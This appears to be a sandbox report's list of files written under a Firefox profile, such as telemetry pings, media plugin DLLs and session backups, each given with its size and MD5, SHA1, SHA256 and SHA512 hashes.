C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\cpfbcvxr.default-release\datareporting\glean\pending_pings\3a71955e-a160-4e1a-bf07-b55282d4f746
Filesize883B
MD54b509acbe035f4d7f0755938b307c827
SHA10056d19cce6cf534bd09c721d7961de34e318009
SHA256fe449d628eeec857f9b63795dd2f785f5ac77105d95f96090888f7d3de3927b3
SHA51284b4a7f75fe3c798fb9e6b9e88415c1ce5a882a4b4cec16841128e2b569f89b0eb491e81a4ae58aaaeae473bcde77f787e0788c5de4da4ea776c0c83520b3976
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\cpfbcvxr.default-release\datareporting\glean\pending_pings\874d5127-b66b-430c-8ea9-20e6992cc87d
Filesize886B
MD545665dc8cb72eb8f8ecee24a6285858e
SHA1fe90aa55a3b6dbf4f93ac77d93fdffcb1cf55239
SHA2567da29b8fe1a4d23eaf3ca07b9b23dcc1094c8c14695f449ab9e22767ca049767
SHA51278eb811d2ae3eb12e4eaeae0fe396265042d8c3043fa0049a2b5a11dc0c1d8e52667dabb98a324ef8e9c14a4e610b454b47345ad0f18744d8ef614784ed4b9f5
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\cpfbcvxr.default-release\datareporting\glean\pending_pings\9ee2f96f-e96f-4518-9df0-47b286b4eaff
Filesize16KB
MD598c6d1943a20835a73d19da0bff45313
SHA1b562f7844b427366fdc514ffc8af33c2fd799f05
SHA256b6d100d8e8d15f7db75cf07542e7821969fd34c0f81d94186ccffb25e4139b3b
SHA5123e47dcfd65ea141001f5408cbe09349e47f7fe9507bb53252ff585b98c5b5bea79339674f8472177d3eb6d1c39c7a8fee635257ee7e2ad7473e8f61f798dbe7e
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\cpfbcvxr.default-release\datareporting\glean\pending_pings\fe1f5765-5027-4d30-b8a4-ed30e127b286
Filesize235B
MD564cac3d62de72e049f7d99fa706c805d
SHA11f1c35ccb2e36452560f367b8fc34c50f94c8277
SHA2564c4b439a0ddc7c8f85b700a187baccd9c2ab8f145429318ab78f11bc09efff58
SHA512706e1dbda083f90dd39e1ad32c80dd2bc1679a9e6bf5873ae276c394bfa986f6fbca1573babf53245b8f7d025856b123615a9e093eed63f571ea83e05376bc44
-
Filesize
16KB
MD58a980652c289c39e1c2074fa1cd84aed
SHA1025c126de9dadc1b08ac4776294165c8f2fb8624
SHA2569da224efbecaf0bd95910cd567d0d8a1b828539124eece0cd98c7adbb7e15682
SHA5120cbe6275f74715c1c54a8ec76b41102e885fba29c07229718129ccdd59ef9e4ac81b1a5ecd8d31caf41b1422cafe2d990a81e41c00475bbb1da278bd66a79797
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\cpfbcvxr.default-release\gmp-gmpopenh264\2.6.0\gmpopenh264.dll
Filesize1.1MB
MD5626073e8dcf656ac4130e3283c51cbba
SHA17e3197e5792e34a67bfef9727ce1dd7dc151284c
SHA25637c005a7789747b412d6c0a6a4c30d15732da3d857b4f94b744be1a67231b651
SHA512eebdeef5e47aeadfeebdbab8625f4ec91e15c4c4e4db4be91ea41be4a3da1e1afeed305f6470e5d6b2a31c41cbfb5548b35a15fccd7896d3fde7cdf402d7a339
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\cpfbcvxr.default-release\gmp-gmpopenh264\2.6.0\gmpopenh264.info
Filesize116B
MD5ae29912407dfadf0d683982d4fb57293
SHA10542053f5a6ce07dc206f69230109be4a5e25775
SHA256fe7686a6281f0ab519c32c788ce0da0d01640425018dcffcfcb81105757f6fe6
SHA5126f9083152c02f93a900cb69b1ce879e0c0d69453f1046280ca549a0301ae7925facdda6329f7ccb61726addee78ba2fffc5ba3491a185f139f3155716caf0a8d
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\cpfbcvxr.default-release\gmp-widevinecdm\4.10.2891.0\manifest.json
Filesize1001B
MD532aeacedce82bafbcba8d1ade9e88d5a
SHA1a9b4858d2ae0b6595705634fd024f7e076426a24
SHA2564ed3c6389f6f7cd94db5cd0f870c34a296fc0de3b1e707fccf01645b455790ce
SHA51267dfe5632188714ec87f3c79dbe217a0ae4dfb784f3fac63affd20fef8b8ef1978c28b3bf7955f3daaf3004ac5316b1ffa964683b0676841bab4274c325c6e2b
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\cpfbcvxr.default-release\gmp-widevinecdm\4.10.2891.0\widevinecdm.dll
Filesize18.5MB
MD51b32d1ec35a7ead1671efc0782b7edf0
SHA18e3274b9f2938ff2252ed74779dd6322c601a0c8
SHA2563ed0dec36754402707c2ae4fbfa887fe3089945f6f7c1a8a3e6c1e64ad1c2648
SHA512ab452caa2a529b5bf3874c291f1ffb2a30d9ea43dae5df6a6995dde4bc3506648c749317f0d8e94c31214e62f18f855d933b6d0b6b44634b01e058d3c5fcb499
-
Filesize
6KB
MD5f69ec6cca7a5c97cf8c8124e59554586
SHA1c84f5c27ab940cf794a2b09e401af684b6c18c40
SHA256ef21813fb6e571e89797c95f4927123a06ccfcceb014ac7b072e283b0e0eccfe
SHA51262e0b1d6855a413396a913f7631d6cd81dac68d54e3822097d76eb6aaf61b87922508f428bface122162488c2009bac6f22809aff4f0d11042469c6b521e2f31
-
Filesize
8KB
MD557272edfd0bea30bcc542ccaaa6d0093
SHA18e22dbbb811a942cde7ac41d7ede8daee8f187a6
SHA2563e1b991976eaf914e86fa3ce65da2f3692f765c90c467a74923f3b8e06548683
SHA512f45341b60b31d684c99f1e64205e948b8f0f2ea2a7e5903382814c7a8bb002ff22da2dfdef740ee810f1a06d9d2e0293da6d3cbb457d9a8f7488ae1c630bc007
-
Filesize
6KB
MD5e1cb74dca5425e677b86ac05aa64b43d
SHA195533bd7c64eb3c5a5e1fbc4a10333a3ed19a737
SHA2568c1b6c9930712208ca16382440100e2d7166b8e34793659ee5ce29aa92e1222a
SHA512ad0c0ea5e7c57e36f51a8c1b072fee7f2fb177badfc06565e2c95c27caddabf1acabd02b151afa765b078c4e7e9d4647ea4e7b58c65425cbe59caca08b13b9b6
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\cpfbcvxr.default-release\sessionstore-backups\recovery.baklz4
Filesize1KB
MD522e16882e954504ad8b47343035118e1
SHA157799a515df2b619f9e6db41ba3e1499ca8225d1
SHA256945645f327fe364a19415b74309ce9e3641e8dfb53541c1d4b068f21d4727eab
SHA512748ebfcffdf89c63fac780c51a5848470d3fffd401ef5cf6323300c457de25d575e42357c4c9b2fae72d476dbbaab678cbf5a9898d644912648f028136f4a884
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\cpfbcvxr.default-release\sessionstore-backups\recovery.jsonlz4
Filesize4KB
MD55fdcd8eb5295e97cc422a8756a631583
SHA1261685473c16152d46ef5103e8e26c9693f60c66
SHA256196e2864d043655f53324f4c0dcc4ce2feb95e2b62dfeaf877e43d6ce6358d7d
SHA51277d58182a5c65c1abd15ce487543d6d64b92c21cf2524cc0b743a28ea80d940f42141fa583f516b3e2e6d90b76b173894803b242817b9b702abe06d305334422
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\cpfbcvxr.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite
Filesize3.5MB
MD52532461f588fdc05bd9eb8fc4d5e2a86
SHA1dd1a1bf845832f1e0b1051732436bcb5f03a4061
SHA256dc63c8d3021db6b1bffc71372345cc77b426e1554bc869039dc37c933ddd0dd8
SHA5125a132b7fbbbc223c6655cb780470af1408b3030aa635658ac48c0b84bcbce549704f5c17017dc1d9bab431d2a146f39f9897f5b675f6aea2ac7e0a7c92c65f56
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\cpfbcvxr.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite
Filesize3.5MB
MD593ff2d6c2ef2871a844d24eb0862a5b8
SHA16a9a21a49a07edcfe2aec65b6d64653cb6f1eb86
SHA256fbf8cbc4ee58b6339981b4594f1c72716dfbb2137205a69d7a5dc06012123c57
SHA51297d08b5b18e59da9f993ebd1f15b9f23a81137ed6389e662a14589b0e2657e91893181d0d7d0b2f9afba1ea07fc2562a90f2589dbbeaae9e49e990b13357f74c
-
Filesize
328KB
MD5173bac52b7b2fb41f57216502b0018a0
SHA1ba019aeda18297a83b848713b423bd7147619723
SHA256e547bd35b7d742c0e2ba69eff99af5106848ac6abb70b2ac7df8402804aed37c
SHA512024c8a2c5e62e86c0a6fe4b452baeaede3dffd17514b40cbefd3947d0c5e4738d16f81dec138de40b77e5993722c4d0857f070b96498dc144ed7d9f20bca0bd0
-
Filesize
484KB
MD5882e0b32bbc7babec02c0f84b4bd45e0
SHA113a9012191b5a59e1e3135c3953e8af63eb1b513
SHA2562d04cc1948c4b8249e5eb71934006fe5dda4db7c856698fb8f2521a77e73f572
SHA51299e314733e6a9eb5b5e5e973d54d4aac8f7aef119cd8f650da0690a46eaaa9c2157cdf0ddc912cbda81587b484b2b88d0b6833c8c4e4c320182d5e584062dd0a
-
Filesize
51KB
MD57edc152258f8d8b0fc227df74ce5ec40
SHA1e9e98a85ec1683453e242b5f14f6c53a45e1347b
SHA2563393d6db8c4e40ba90bbc35a63784986798d50ce43f1dfc7da54ce77252c3502
SHA5121a57b29eaa8b91caf0566d5a58bb2cfb10ac4a3ddc26886d786296ecd2509d97e32b18f8a0923dfb419fec3e97d38e970331ce0fbdf7dd66c10266c1003f9d4d
-
Filesize
963KB
MD5e3bf59dcaddcbe977271013990f02fc7
SHA135a90f5551e78a6d9e87aaeeb3e4ae41020e1f6b
SHA2564801932ad6fc5868430612476b23c978f1902e9e4941b7ebe249f1709ccdddf2
SHA5128017c4a9428a1a4103735ea3b246492ef490deeafa16a896556d56ace7de8691fee285d3af16efa57db6e202945917bb2d7e28848569fc7732a8294c579b7676
-
Filesize
2.2MB
MD5832205883448ab8c689d8a434d92f80b
SHA1890c403a288c65683edbe9917b972ceb6eb7eba7
SHA256558addae67d50612acd60a02fb29d41be61999d299348df9a225e419cc9395ed
SHA5120c1b8b3776c14b78f9b7ac09627ca7762f62c63da489204f376519752b029951798c1ed24aed07cc660c5e54936c06560fda921e33a76e80ebab10ef97177973
-
Filesize
641KB
MD5cdbf8cd36924ffb81b19487746f7f18e
SHA1781190c5a979359054ce56ceef714a8f5384cfbb
SHA2560813c77df688b39f26bad0be2b3e4afde13e97d9a1ebcbdb3b1f4184218d1a57
SHA512ca43450e853b3c74808ad199abe329ac2a2d7ae2e84c17fb467374c22ec9620fb102c75889e279e2d28f0ebd14d8bafafe700241ba4141fd64b4801802a3d474
-
Filesize
53KB
MD52a2c442f00b45e01d4c882eea69a01bc
SHA185145f0f784d3a4efa569deb77b54308a1a21b92
SHA256d71db839de0bc1fcc01a125d57ced2aaea3f444a992426c316ce18c267c33a8c
SHA512f18d9019eee843d707aa307714a15207be2ded2eceab518599fbed8a3826a1a56f815fe75fb37f36c93be13f3d90e025f790db6b3ba413bfd5cd040b2cc7dbf7
-
Filesize
4.2MB
MD5dc2a327ce67d6a46f19be31f10058db1
SHA136b0ab6834587c51e0473e0ce70e8b85925530ab
SHA256f9b6d35a739acb63d9dedbcf66cd711cf4d376fc0c55a11321f8b78672ecdfda
SHA512efb4ea8fa59815df648db2baec1d4cd55dc595a4c92c602aa6c46fcbfe365122d1c50bea41805483be2629a79307cf91ca2ef616400ac9f32d6a77957d29a4c5
-
Filesize
411KB
MD5bc83108b18756547013ed443b8cdb31b
SHA179bcaad3714433e01c7f153b05b781f8d7cb318d
SHA256b2ad109c15eaa92079582787b7772ba0a2f034f7d075907ff87028df0eaea671
SHA5126e72b2d40e47567b3e506be474dafa7cacd0b53cd2c2d160c3b5384f2f461fc91bb5fdb614a351f628d4e516b3bbdabc2cc6d4cb4710970146d2938a687dd011
-
Filesize
536KB
MD5272a9e637adcaf30b34ea184f4852836
SHA16de8a52a565f813f8ac7362e0c8ba334b680f8f8
SHA25635b15b78c31111db4fa11d9c9cad3a6f22c92daa5e6f069dc455e72073266cc4
SHA512f1f04a84d25a74bb1cf6285ef705f092a08e93d39df569f6badc45b8722d496bbbef02b4e19f76a0332e3842945506c2c12ad61fe34f339bb91f49b8d112cd52
-
Filesize
755KB
MD50e37fbfa79d349d672456923ec5fbbe3
SHA14e880fc7625ccf8d9ca799d5b94ce2b1e7597335
SHA2568793353461826fbd48f25ea8b835be204b758ce7510db2af631b28850355bd18
SHA5122bea9bd528513a3c6a54beac25096ee200a4e6ccfc2a308ae9cfd1ad8738e2e2defd477d59db527a048e5e9a4fe1fc1d771701de14ef82b4dbcdc90df0387630
-
Filesize
612KB
MD543143abb001d4211fab627c136124a44
SHA1edb99760ae04bfe68aaacf34eb0287a3c10ec885
SHA256cb8928ff2faf2921b1eddc267dce1bb64e6fee4d15b68cd32588e0f3be116b03
SHA512ced96ca5d1e2573dbf21875cf98a8fcb86b5bcdca4c041680a9cb87374378e04835f02ab569d5243608c68feb2e9b30ffe39feb598f5081261a57d1ce97556a6
-
Filesize
65KB
MD5f87eda56ee636bbdac761d77b8bb2203
SHA1e17b37ae69712ce8447eb39097a8161fbd0d3c5e
SHA2569be5e012d40ddccd58385b4ed9254b7955116e272f20593f386b521d707d75e8
SHA51284cf3eec60a82a27760a950cc279ab1139eafe6cbe3e6431b05eff57a0235616b8169f5e0d5c1888206184c838dc7a690fbb3c4a0e7aad69be2f95eb4db220ce
-
Filesize
1.0MB
MD5f120a94e61713a3a5cf3ac400627d090
SHA13c2a06936897296935bae0ca5537d51d5e22d5cd
SHA256f1ca8e790508fed578676222ab996e480e372f5ffc6c99b9f41524ddb5eac8b5
SHA512b62adfc71855ffee272b1c75df40deb72d0304c060d0556f56e3aeae6e56691f404d799ddd39494ac2207da2795baf874b3d39e537a5aa1777dedd2c229c6283
-
Filesize
603KB
MD5e1a0e89902ec9638e8e139189db0e8a6
SHA1c4df08518f517df2b54d76ee68f4efca29a109a1
SHA2567a0c986542ee5a59a3b3a5c3b278cb35458503ad703d696840585acc8a45d475
SHA5126a307199b7df557eb85fd5fa2fed248f658dc4cd867d4fcd99030139504eccaccd70f53cffaa3ad8a48fc297a87fc26f3b1a16341886a28759b7bbd5df63d502